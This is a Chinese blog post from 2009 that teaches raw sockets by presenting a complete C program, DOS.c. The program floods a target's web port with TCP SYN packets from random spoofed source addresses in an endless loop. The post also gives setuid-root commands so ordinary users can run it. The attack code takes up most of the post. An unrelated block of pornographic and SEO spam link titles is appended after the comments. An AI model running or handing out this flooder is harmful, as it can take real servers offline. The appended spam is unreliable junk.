• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            <2025年5月>
            27282930123
            45678910
            11121314151617
            18192021222324
            25262728293031
            1234567

            統計

            • 隨筆 - 4
            • 文章 - 0
            • 評論 - 2
            • 引用 - 0

            常用鏈接

            留言簿(1)

            隨筆檔案

            搜索

            •  

            最新評論

            閱讀排行榜

            評論排行榜

            原始套接字

            原始套接字
                 我們在前面已經學習過了網絡程序的兩種套接字(SOCK_STREAM,SOCK_DRAGM).在這一章 里面我們一起來學習另外一種套接字--原始套接字(SOCK_RAW). 應用原始套接字,我們可以編寫出由TCP和UDP套接字不能夠實現的功能. 注意原始套接字只能夠由有root權限的人創建.

            10.1 原始套接字的創建

            int sockfd(AF_INET,SOCK_RAW,protocol)

            可以創建一個原始套接字.根據協議的類型不同我們可以創建不同類型的原始套接字 比如:IPPROTO_ICMP,IPPROTO_TCP,IPPROTO_UDP等等.詳細的情況查看 下面我們以一個實例來說明原始套接字的創建和使用

            10.2 一個原始套接字的實例
            還記得DOS是什么意思嗎?在這里我們就一起來編寫一個實現DOS的小程序. 下面是程序的源代碼

            /********************   DOS.c                *****************/
            #include
            #include
            #include
            #include
            #include
            #include
            #include
            #include
            #include

            #define DESTPORT         80        /* 要攻擊的端口(WEB)       */
            #define LOCALPORT        8888

            void send_tcp(int sockfd,struct sockaddr_in *addr);
            unsigned short check_sum(unsigned short *addr,int len);

            int main(int argc,char **argv)
            {
            int sockfd;
            struct sockaddr_in addr;
            struct hostent *host;
            int on=1;

            if(argc!=2)
            {
                     fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
                     exit(1);
            }

            bzero(&addr,sizeof(struct sockaddr_in));
            addr.sin_family=AF_INET;
            addr.sin_port=htons(DESTPORT);

            if(inet_aton(argv[1],&addr.sin_addr)==0)
            {
                     host=gethostbyname(argv[1]);
                     if(host==NULL)
                     {
                             fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
                             exit(1);
                     }
                     addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
            }

            /**** 使用IPPROTO_TCP創建一個TCP的原始套接字     ****/

            sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
            if(sockfd<0)
            {
                     fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
                     exit(1);
            }
            /********   設置IP數據包格式,告訴系統內核模塊IP數據包由我們自己來填寫   ***/

            setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));

            /****   沒有辦法,只用超級護用戶才可以使用原始套接字     *********/
            setuid(getpid());

            /*********   發送炸彈了!!!!           ****/
            send_tcp(sockfd,&addr);
            }



            /*******   發送炸彈的實現    *********/
            void send_tcp(int sockfd,struct sockaddr_in *addr)
            {
            char buffer[100];   /**** 用來放置我們的數據包   ****/
            struct ip *ip;
            struct tcphdr *tcp;
            int head_len;

            /******* 我們的數據包實際上沒有任何內容,所以長度就是兩個結構的長度   ***/

            head_len=sizeof(struct ip)+sizeof(struct tcphdr);

            bzero(buffer,100);

            /********   填充IP數據包的頭部,還記得IP的頭格式嗎?      ******/
            ip=(struct ip *)buffer;
            ip->ip_v=IPVERSION;              /** 版本一般的是 4       **/
            ip->ip_hl=sizeof(struct ip)>>2; /** IP數據包的頭部長度   **/
            ip->ip_tos=0;                    /** 服務類型             **/
            ip->ip_len=htons(head_len);      /** IP數據包的長度       **/
            ip->ip_id=0;                     /** 讓系統去填寫吧       **/
            ip->ip_off=0;                    /** 和上面一樣,省點時間 **/        
            ip->ip_ttl=MAXTTL;               /** 最長的時間    255     **/
            ip->ip_p=IPPROTO_TCP;            /** 我們要發的是 TCP包   **/
            ip->ip_sum=0;                    /** 校驗和讓系統去做     **/
            ip->ip_dst=addr->sin_addr;       /** 我們攻擊的對象       **/

            /*******   開始填寫TCP數據包                            *****/
            tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
            tcp->source=htons(LOCALPORT);
            tcp->dest=addr->sin_port;            /** 目的端口     **/
            tcp->seq=random();
            tcp->ack_seq=0;
            tcp->doff=5;
            tcp->syn=1;                         /** 我要建立連接 **/
            tcp->check=0;


            /** 好了,一切都準備好了.服務器,你準備好了沒有?? ^_^   **/
            while(1)
               {
            /**   你不知道我是從那里來的,慢慢的去等吧!       **/
                 ip->ip_src.s_addr=random();     

            /** 什么都讓系統做了,也沒有多大的意思,還是讓我們自己來校驗頭部吧 */
            /**             下面這條可有可無     */
                 tcp->check=check_sum((unsigned short *)tcp,
                             sizeof(struct tcphdr));
                 sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
               }
            }

            /* 下面是首部校驗和的算法,偷了別人的 */
            unsigned short check_sum(unsigned short *addr,int len)
            {
            register int nleft=len;
            register int sum=0;
            register short *w=addr;
               short answer=0;

            while(nleft>1)
            {
               sum+=*w++;
               nleft-=2;
            }
            if(nleft==1)
            {
               *(unsigned char *)(&answer)=*(unsigned char *)w;
               sum+=answer;
            }
              
            sum=(sum>>16)+(sum&0xffff);
            sum+=(sum>>16);
            answer=~sum;
            return(answer);
            }

            編譯一下,拿localhost做一下實驗,看看有什么結果.(千萬不要試別人的啊). 為了讓普通用戶可以運行這個程序,我們應該將這個程序的所有者變為root,且 設置setuid位

            [root@hoyt /root]#chown root DOS
            [root@hoyt /root]#chmod +s DOS


            10.3 總結
            原始套接字和一般的套接字不同的是以前許多由系統做的事情,現在要由我們自己來做了. 不過這里面是不是有很多的樂趣呢. 當我們創建了一個TCP套接字的時候,我們只是負責把我們要發送的內容(buffer)傳遞給了系統. 系統在收到我們的數據后,回自動的調用相應的模塊給數據加上TCP頭部,然后加上IP頭部. 再發送出去.而現在是我們自己創建各個的頭部,系統只是把它們發送出去. 在上面的實例中,由于我們要修改我們的源IP地址,所以我們使用了setsockopt函數,如果我們只是修改TCP數據,那么IP數據一樣也可以由系統來創建的.

            posted on 2009-04-26 18:24 梁少林 閱讀(861) 評論(1)  編輯 收藏 引用

            評論

            # re: 原始套接字 2009-04-28 00:40 shongbee2

            哈哈,學習了。謝謝。
              回復  更多評論    
            亚洲另类欧美综合久久图片区| 亚洲精品高清久久| 国产成人久久精品一区二区三区| 伊人色综合久久天天网| 久久亚洲精品无码AV红樱桃| 久久er国产精品免费观看2| 免费精品久久久久久中文字幕| 久久精品国产亚洲AV影院| 色综合久久久久| 午夜精品久久久久久久| 久久久久黑人强伦姧人妻| 国产aⅴ激情无码久久| 久久激情五月丁香伊人| 久久久久99精品成人片试看| 欧美午夜A∨大片久久| aaa级精品久久久国产片| 中文国产成人精品久久亚洲精品AⅤ无码精品 | 精品久久久久一区二区三区 | 精品久久久久久国产牛牛app| 久久久久国产精品嫩草影院| 国产精品午夜久久| 99久久超碰中文字幕伊人| 一本一本久久A久久综合精品| 久久av高潮av无码av喷吹| 青青青国产成人久久111网站| 五月丁香综合激情六月久久| 久久亚洲sm情趣捆绑调教| 精品久久综合1区2区3区激情| 久久综合久久综合久久综合| 亚洲精品国产美女久久久| 久久精品国产亚洲AV香蕉| 成人综合久久精品色婷婷| 亚洲另类欧美综合久久图片区| 国产亚州精品女人久久久久久 | 97精品国产97久久久久久免费| 久久99精品免费一区二区| 色综合久久中文综合网| 日本精品久久久久中文字幕8| 青青草国产成人久久91网| 丁香五月综合久久激情| 精品久久久久国产免费|